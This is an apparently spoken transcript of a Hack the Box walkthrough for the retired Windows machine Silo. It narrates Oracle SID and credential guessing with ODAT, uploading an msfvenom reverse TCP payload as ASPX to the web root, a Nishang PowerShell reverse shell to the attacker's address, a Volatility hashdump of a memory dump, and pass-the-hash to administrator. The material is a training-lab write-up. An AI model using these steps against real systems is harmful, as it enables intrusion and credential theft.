Okay, so we are going to do the Windows machine silo that just recently retired from Hack the Box. Um, wasn't the easiest machine. Ran into a lot of issues regarding dealing with Oracle from Linux, especially Oracle exploitation. Luckily, there is a tool that we're going to be using that made it a little easier rather. But for the most part, pretty fun box, pretty interesting. You definitely learn a lot. So got our IP right here. So let's go ahead and minimize this and let's get to it. So we're going to make a directory called nmap and we will nmap the box. So just the usual 10, 10, 10, I already forgot, 82. Just the usual flags, enumerate versions, run default scripts on the ports found, and output formats into the folder and then into a file called initial. So we will let this go. Let's see, almost done. Well, the initial scan's almost done. Then it's going to run through the scripts. Uh, so in the meantime, let's see. Let's just see if this host has a web portal open. So I remember this box fairly well, so it's not going to be like a first time run, but it has been a while since. Okay, so there is a web server. It has been a while since I have done it, but again, it's not going to be like a like a like an unknown run, but I probably will run into a few unknown points throughout this. So okay, so we do see that. Hmm, see that there's a web server running on port 80. Since we can go to this, looks like this whole page just kind of links to Microsoft. So let's go ahead and view the page source. Nope. Yeah, it looks like it's just one big image that links right into that. So nothing interesting there. We can do like slash admin. Nope. Slash dev. Nope. Root. Nope. Nope. Okay. See if this is done yet. Almost done. So we can have GoBuster running in the background just to have something scanning while we wait. So we can do URL 10.10.10.82 word list user share word lists GoBuster directory 23 medium 30 threads. Let's just do that. There we go. All right, so let's see what we got. Is that all of it? Yep. Okay, so we have port 80, which we knew. Looks like we have some RPC ports open. Can look into that. And looks like we have SMB as well, 39445. And what the unique thing about this box is this Oracle TNS listener. And we have it down here as well. Um, but this is the sort of default port. So this is probably what we're going to focus on since it's unique. A lot of this other stuff doesn't really tell us a whole lot. We can see what kind of OS might be running on this. It's guessing 2008 or to 2012 R2 server. Um, but let's just focus on this Oracle TNS So we're going to download a tool which I found, which is called ODAT. We'll do GitHub. It's the Oracle Database Attacking Tool. This is what made it super easy. Well, not super easy, but a lot easier than exploiting this manually. So we'll do this. And I'll walk through what it kind of does as we get through it. Is there a setup? No, so let's see. Pen testing tool. Okay, changelog. Features. Execute system commands. Blah, blah, blah. It's just showing how it works. Dependencies. Installation. Optional for development version. So we did that. We go into ODAT and we run. Nope. We'll run that and we will run this. Okay. Now, let's see. We'll try it without doing this first, just because I think I have it. SQL plus. Ah, maybe not. Okay. So let's do this. All right. Do that. So we can download the software. Instant client, x64. Let's do basic zip. All right. All right, let's quickly make an account. This is what was really annoying about trying to get Oracle to work on Linux. Let's not do. I think I found like Oracle GitHub. What was it called? Like instant client. Whoa, whoa, whoa. Come on. Really? Oracle. Come on. Wow. All right. Oracle GitHub instant client. There we go. So, what was that? Instant client 18.3. These are a little outdated. When was the last? 7 months ago. Let's see. I think we can get away with it. But let's see. SDK packages. No. Deployment? No. Alright, so we'll grab that. Shouldn't be, it's not going to be the latest, but it should work. So let's do 12, let's see, basic 12.2, x86. Basic Linux 12.2. Let's just do that. We can just copy that. Might take a bit since there's all those zip files. Okay, it's thinking about it. Alright, well that's waiting. We can check in on our Go Buster. Still nothing. You know what? Let's cancel this. I'm just gonna black out the screen and I'm going to quickly register. Should have done it beforehand. I remember getting it from a GitHub repo, but I don't feel like sitting through that, so let's do this. Oh, so we'll do that. Create an account. I'm gonna black out the screen real quick. All right. So we created that. I'm just gonna get this request through my email. Do it on my phone. Okay, verify email. Okay, so now we can log in. So, go here. Didn't mean to close that out. Scroll down, download this, accept, sign in. Nope. Okay. Okay, we will download that. Okay, so the download's done. We will move that file. Downloads Oracle. Instant. Here. Unzip. I keep closing that. Alright, so let's see what we gotta do now. So we downloaded that. Do this. Let that go. 404. Update. Okay, so it finds the packages. There we go. Okay, and then we will run these. Okay. Pseudo alien. Looking for .debian, .rpm. Generate Debian. To deb alien to deb instant. From RPM files. Let's just do that. If we are root, see Oracle. Yeah, this is the issue. So we need this done. Create, install Python dev alien to deb. C cap basic. All right. This is not clear. Wonder if I downloaded the wrong thing. Because it's saying RPM. Yeah. Let's try this. Sorry about that. Let's see if that works. So remove instant. Okay, so let's move downloads, instant, what's it called, Oracle, to here. Okay. All right, so we installed that. Nope. But this will be client 18.3. Alien to deb Oracle instant client. There we go. So we need all of those. So we need basic, SDK devil, that. Oh, okay. Okay, SQL plus. Okay. Okay. So this is doing its thing. Pretty sure. Hopefully. Ah, there it goes. Okay. We got Debian. Then we wanted move downloads Oracle star to here. All right. So we go back here. Alien to deb Oracle instant client devil. Let's do SQL plus. We'll let that go. So it's a lot of this. It's a lot of setup. So that worked. And then alien to deb Oracle devil. Okay. So once that's done, we'll do dpkg-i Oracle basic. Okay. And then SQL. And devil. All right, that's done. Now we do this. Profile. Whoop. And it's not going to be 11.2 since we were dealing with that 18 whatever. So ls user lib Oracle 18.3 client 64. It's fine. It's fine. Okay, and then we'll exit this. Whatever. So now we have a new terminal, and there's SQL plus. All right. I'll create a symlink. ln-slib lntsh dot so. What? Do we need to do all that? Ugh. If not, good job. Restart your session. Oh, cd oracle home/lib ln-s lib libc.so.18.1 libcln libclntsh.so. Huh, it already exists. Alright, it's already symlinked. Create this file and add the path. /user lib oracle 18.3 /client 64/lib. ld config. Not sure what that does. Source, let's see, profile, pip install cx oracle. Okay. Python-c import cx oracle. Cool. Let's exit out of this. Let's just double check that still works. Import cx oracle. Cool. Install blah blah blah. Already good. Already good. Current's already satisfied. Alright, I think we're good. Alright, so thank you. So now we will run -h and see what it needs. So version all, let's see, to run all modules. What do you need in terms of running you? Possible arguments. Does it have examples in here? Examples? Okay, so it looks like ODAT all. There we go. So dash S is the server, 10.10.10.82. And P. So we won't do all. So let's do this again. See what we can do. We can do some TNS poisoning attack, which is a man in the middle attack, so we're not going to do that. We can do SID guesser. So let's do SID guesser -h. So we'll give it the server 82, and the port 1521. Yep. Let's see if you can give it a civ. All right. It's good. Don't know the SID, blah, blah, blah. Let's try that. Thanks to a well-known SID list on the server. Okay, it is 82, right? Yep. Okay. So we'll let that go for a bit, and let's take a look at what else we can do once we have a SID. Because if you noticed, even in this, it was asking for an SID. Once we have that, we can start enumerating more stuff. So the next thing I believe we want to do, try each, no, we could do all to get hashed Oracle passwords, steal remote passwords, DNS command, to no valid credentials. I think that's what we want next. So once this is done, and I remember this being a pain too, and I'll show you why once we're done. So we'll let this go. And the reason I wasn't concerned earlier when I killed this is that I know that this isn't going to be an issue. It's not an avenue of attack, so not too concerned about it. Let this go a little bit longer. Looks like another minute. There is I think there's Metasploit or something available for this, but I really don't prefer using Metasploit because you don't get the fun of learning all this and dealing with Oracle setups and stuff. So and this is one of the boxes that I actually didn't understand what the box name implied. Doesn't really indicate anything with Oracle, I don't believe. Usually they're like kind of a hint, so like Oracle silo, something like that. Silos prevent sharing. Yeah, I'm not sure. Doesn't make a whole lot of sense to me. Even when you're on the box, I still don't understand it. But usually I use that as like if I can't really understand it, there are certain boxes like Valentine with Heartbleed. There are a couple other ones that I don't understand either, like Tally and stuff like that. Okay, so it looks like we got two SIDs that come back, XE and XEXDB. Let's go ahead and quit this just because I know XE is what we're looking for, so that's a good thing to note. So let's do, what is it, password guesser dash H. Yep. So we want the server again, 10.10.10.82, the port 1521. We can just leave that default. SID is XE. So, okay, so this is the issue. If we look in here, there is a directory called accounts. So we go in there, and it's going to use accounts.text. Now the issue here is that these are all uppercase. Now for whatever reason, that's not the case with this. So what we can do is, I think there's a Metasploit file. So that's not going to be the case with this box, that the credentials aren't going to be uppercase, and in fact they're going to be lowercase. So let's go into that accounts directory again, and let's copy, let's see, user share word lists, Metasploit. Let's see, Oracle default user pass to here. Is that how it is here? Cat accounts.text. Looks like they're separated by a slash. Oracle default. Alright, so let's just try it out. Do that. So S for the server, 82. SID is going to be XE like we found out, and accounts file is the accounts Oracle. Let's do that. Oh, Maxval. Password guesser module. Progress bar. Alright, so it's definitely the Oracle. Forget the Vim. Search and replace. Space. Remove unwanted spaces. I don't want to remove them, I want to replace them. Search and replace, that's fine. Basic search and replace. So find each occurrence of foo and replace it with bar. So %s slash space slash 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 g trailing characters. %s to slash space aha, sweet. It always feels good to get a macro right. All right, boom. All right, so we'll let that go. Hopefully it shouldn't take too long. The file's not entirely too long. And it will go through each one and try and find a valid login. Login has already been tested at least once. Continue. Are you continuing? I can't tell. Let's stop it. Is it going? pretty sure it's going. And by pretty sure, I mean not too sure. We'll find out. We'll give it a little bit to run. Maybe it'll say that it did another one already. Counts.text. Let me see if it's in here actually. Pa, pa, pa. So, just making sure that the password's actually in here. Oh, yep, there it goes. It's gone. Okay, I'm gonna assume it's in here if it has that. Oh, you know what? It put a G everywhere. Ugh. Cancel. Vim count ODAT counts Oracle find /G replace. All right. Continue. All right. This time it should actually find it. I must have really messed up with the macro. I'm sure I put that G there in the wrong spot and it replaced it with it replaced every space with it got rid of the space but replaced it with a G. So normally that G means globally. But all right, so let's exit. Okay, so that's still going. About 6 minutes. Not too bad. We will get rid of this. This. Keep this up just in case. Does that happen every time I hit enter? No. Okay. So we'll let that run for a little bit. Okay, maybe it does. Maybe it just has to calculate it. Should find it somewhat quickly. Again, I'm pretty sure there's a Metasploit module for everything that this tool does. But for this one, it's just so, like I've said before, I prefer the personal feel of running exploits that I find or write. Just because I know if something goes wrong or I need to troubleshoot like stuff like this, that generally the error reporting is better than Metasploit will ever be. I hate dealing with Ruby, so most of these are written in Python, which I can, for the most part, troubleshoot. Um, that are in like C and like um, compiling issues and whatnot. Um, that stuff I can troubleshoot and I can fix right on the fly. Whereas with Ruby, and especially with the Metasploit framework, I just don't prefer it. Um, and then also, you don't really learn with Metasploit. You kind of just, you know, use blah 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 and just go. Um, with these, you have to kind of know what you're doing, know what the exploit is doing, learn about the exploit to do it right. For the most part, like this is kind of like a kind of Go, but you need to know like you need the SID and you need to know. We'll see later how different exploits work and how Oracle is working and how we're exploiting it. Whereas with Metasploit, it just kind of does it for us and then just does everything, gives us a shell, stuff like that. Um, which I don't prefer. If I've learned the subject enough um, where I feel comfortable, I'll use Metasploit just to, hurry up and get what I need. But for the most part, I prefer these. So it looks like it's moving a little quicker now. I know what we need is a little bit towards the end, so almost done here. Okay. Okay, looks like it's coming to a finish. Do do do. Come on, you got it. There we go, Scott Tiger. So those are default credentials, but normally they're um, capitalized. So let's go ahead and quit out of that. So we got Scott Tiger. Normally they're capital, like all caps, and that's why the default accounts file is all caps, because that's normally what everything would be. Not the case here. So let's see what we'd want next. So we'll do -h, see what module we want next. So we got password guesser. So now let's see. Let's do something like, let's try to like upload yeah, let's do that. So what we can do first is ODAT, UTL file -h, see what we need. So we need S, of course, 10, 10, 10, 82. We need the user, which is Scott. We need the password, which is Tiger. We need the SID, which is XE. Let's do test module first. See if we can actually do this. Test if the UTF file can be used. UTF file library. All right, so let's touch A, echo, blah, into A. So we'll do this, XE, UTL library. Let's just test it ourselves. So we'll do put file C temp, put file remote path. Oh, remote path local file. Does it mean remote to us? Remote database server. Yeah. C temp, and we'll call it blah.text. Actually, default inet pub location. Never remember this. Where is www root? No, not what I want. C inet pub www root. Okay, so C inet pub / www root. So this is the remote path. Then remote file will be blah.text, and then we'll do A. Did I not give you 3 arguments? Expected 3 arguments. What did I give you? Blah.text, hey? There we go. Insufficient privileges. sysdba. Invalid file operation. Whoops. Okay, so it doesn't like that. Let's just try temp. So again, this is just a test. Invalid file operation. Huh. Whoop. Let's see. There we go. So you see here we have to escape the forward slashes because here it's doing whatever. So that worked. So the file was created on www root server on the server like the blah.text. So let's just see if that created it. Echo blah. Cool. So now that we can do that, let me see if we don't have to be sysdba. Insufficient privileges. Okay. So we got that going. Let's go ahead and fire up. Let's open a new thing. Service postgro start. let's do ton 0, 14.2. So let's go ahead and do MSF Venom dash payload, which will do Windows, x64 interpreter verse TCP lhost equals 10.10.14.2 L port equals 443. Format, we'll do an executable, and we'll put that into reverse.exe. Let's try that. See how that goes. Looks like it's working. Cool. Yep, it's fine. MSF console. So let's close that. Use exploit multi-handler just to set up a handler for our thing. Set payload Windows x64 interpreter reverse TCP. Set L host to ton 0. Set L port to 443. Exploit -j. Cool. We'll do this. Ooh, didn't like that. During the read, do rev.exe. Ooh. Ah. Actually. A.exe. No such. Okay. That was weird. Rev.exe. Ah, wait. Scan ports. utl file-h. Remove file, get file, put file. How do we run a file? Let's see. Upload file or execute system commands. How to run a file from ODAT. Exploit. Use file. C -C. Oh, no. Not what I wanted. Let's see what they say here. I've just completely forgotten this part. Download files, upload files. Execute system commands. that what I want? Let's see. Actually, you know what? Let's go ahead and do this. Let's try running it as ASPX. Because I believe Windows will execute. It's the same payload, so it shouldn't matter. Okay. So let's do rev. Oh. Move rev.aspx to /odat or odat/ aspx as rev.aspx. Okay. Let's see if we can do that. Rev.aspx. Okay, sending stager. Sessions-i1. Get UID. Okay, so we are. Who am I? So we're IIS, so we're the web server. That is good. So at this point, I believe we can get user. Okay. Just making sure my recording is still going on. All right, so we will go into users, Phineas, Phineas, desktop, and user.text. Yep. So now we can do Oracle Oracle issue .text. So let's see what this says. I remember this being annoying too. Okay, so we look into this. We got the user flag. We look into this. It says support vendor engaged to troubleshoot Windows Oracle performance issue. Full memory dump requested. The Dropbox link provided to vendor and password under separate cover. Drop link password. So we can open this link, and it goes to a Dropbox, and it says you're trying to access something that's password protected. It says this is the password. I'm going to tell you right now it's not. You can see here. Nope. Paste. Not the password. It's actually interesting. It's not printing the one character at all. Okay. So what we can do, how did I get this? What we can do, how to base 64 in PowerShell. Let's see. So let's do PowerShell exec. What is it? Execute policy bypass. Policy bypass. Forgetting all this stuff now. Execution policy bypass. PowerShell dash execution policy bypass. So once that loads, we'll be in a PowerShell thing. Yeah. And then we can do this. Hopefully. It's going to talk about that. Let's do that shell. Gonna do PowerShell. There we go. Okay. So we'll do text equals C users Phineas desktop Oracle or here's another deal. So we'll just use Meterpreter. Download users Phineas desktop Oracle issue.txt. Do quotes. Great. No. It's still doing it. Download initial block size, set the limit, Let's see, let's drop into a shell. Users, Phineas, desktop. Alright, PowerShell. Base 64 contents of file PowerShell. Lots of Googling, lots of Googling. Whoop. Let's see. Don't want a script. Correct approach. Okay, let's see. Get content without raw. File equals convert to base 64 string io.file read all bytes and we want escaping space Windows CLI. We'll try the Oracle. Cancel. Okay, let's try that. See if maybe this just takes a minute. If not, what we can do is transfer the file, maybe using Nmap. That might work. Alright. Shell users Phineas desktop Okay. Let's do file equals get content, right? Oracle issue PowerShell. Execution policy bypass. This does not like PowerShell for some reason. File equals get content Oracle issue dot text. Yeah, what is going on? It just does not like PowerShell for some reason. Let's cd opt Windows. No. Oh, Nishang. Let's see. Is this what I wanted? No. CD power sploit. Persistence. Power sploit? What am I looking for? This isn't it, is it? No, I definitely want Nishang. Bypass client execution? Oh, shells. There you go. Stream boxes silo. CP opt Nishang shells invoke PowerShell TCP.ps1. Okay, here. Okay, invoke. Is that going yet? Nope. So, I want to take that. Whoop. Reverse 10, 10, 10. Nope. 14.2. Yep. Port 444. That's fine. PWD. Users. Phineas. That's CD. Whatever. Phineas. Okay, just want to get to downloads. Alright, put or upload invoke. Temp. Can we put it here? Nope. Okay, let's go to where's classic.net app pool? No. Ooh, died. Neat. All right. Where am I? PWD. Who am I? Get UID. CD back. CD temp. That's what I wanted. Upload. Invoke. Okay. Shell. Okay. Do anything? No. PowerShell -h. Let's see. Just trying to figure out how to run this here. PowerShell. File. Run the specified script. Okay. Dash file. Invoke. File this. See if that actually does anything. Da, da, da. Alright, I know how to fix this. Ooh, invalid argument. Oh, you dumb. Dir, delete, remove, invoke, PowerShell, TCP, invoke, PowerShell TCP.ps1, upload, shell, PowerShell dash file, 4444, file invoke PowerShell TCP.ps1. There we go. All right, so now that we are in a PowerShell, we can start doing this. Users, Phineas, CD desktop. It's actually just much faster than Metasploit, which is good. All right, so now let's convert this file into base64 so we can get it on our machine. So what we want to do is file, the variable file equals what is it? Get content. And then our file name. Okay. And then let's see, file. Okay. So then we want the data of file to system.text.encoding this Unicode no, probably not Unicode, like UTF-8. Try that. UTF-8.get bytes. Oh wait. File 2. File 2 equals system.text.encoding UTF-8.get bytes of file. Nice. file 2. Or no. Let's just do okay. File 3 equals convert to base 64 string and the value of file 2. Just remember that's fill 3 and not file 3. I don't feel like writing all that out again. Okay, and then fill 3. Nice. So we'll copy that. Coded base 64-D encoded. Aha, and there we go. And after all of that, we finally got the password. So before it was showing it like this, where it's just a question mark, and even in Metasploit, it was showing just %. Took a long time and some help when I was first doing the box to figure out that that's the actual password. So it just didn't like that pound symbol. So then we get into here. So now we finally get the memory dump here. We get into the Dropbox. It's a memory dump that they provided to the vendor. Excuse me. So let's go ahead and direct download. We'll save that. Should only take a couple seconds. Downloads to silo to here. Unzip silo. So that's going to take a while for it to go. And then we are going to use a tool that I actually haven't used since doing this box, but it was a new tool for me. It's called what's it called? Okay, we can get rid of some of these tabs now. Just eating up a bunch of my system resources, inflating that. There we go. Delete that. Volatility. So that's what we're going to use. So we'll go ahead and run that. It's just a forensics tool. Since this is a crash dump, according to here, or we can even just file silo .dump. And it's a Windows crash dump. So let's remove silo.zip. Oop. So let's look through here. And the first thing that jumped out at me when I first ran this was hash dump, but what we need for that is a profile. So I believe dump kernel. There's something in here that helps us find out the profile. Proc dump, pool peak, patcher, notepad. version. Let's see, raw to dump. Or what we can do, find out system info, command line Windows. It's really just system info. There we go. So we can look through here, see what we're running. Okay, so we're running 2012 R2 server. So we do hash dump -h. There we go. So -h. So we need the file. So that's the dump file, and here's the profile. Use --info. Do --info. So we have 2012 R2 server, 64-bit. So that's going to be our profile. So -f was the file. Let's see, which is silo --profile equals that. Let's give that a shot. So hash dump obviously is the juiciest thing that you could think of when it comes to reading crash dumps, which basically occurs when your computer freezes up, sort of like, I don't know, you're running too many things or whatever. So we do see the hashes for Phineas, guest, and administrator. Since we were already Phineas, we can go ahead and just run administrator because that's our ultimate goal. So we can do what's called pass the hash. Let's do win.exe. We'll do username administrator. And then let's just do pth-h. So we need user, which is administrator. And then you see here password. So we'll use the hash since we're passing the hash. Host, which is 10.10.10.82, and the command we'll do is cmd.exe. Logon failure administrator. Oh, I didn't grab the whole hash. We need the nt and lm hash. So substituting NTLM hash, because you can just pass a password for this, but okay. Who am I? We are administrator, so we can go into users administrator, cd desktop. Ooh, doesn't like that. Try not to mess up because it doesn't like backspace. Type root.text. Type root.text, and we're root. Cool. So that is the box. Kind of fumbled around there for a bit, but ended up getting through to it. that is all I want to do. It is 1 a.m. here. That is Silo, super fun box. And yeah, that should end the stream. Super cool. Awesome. See you guys later.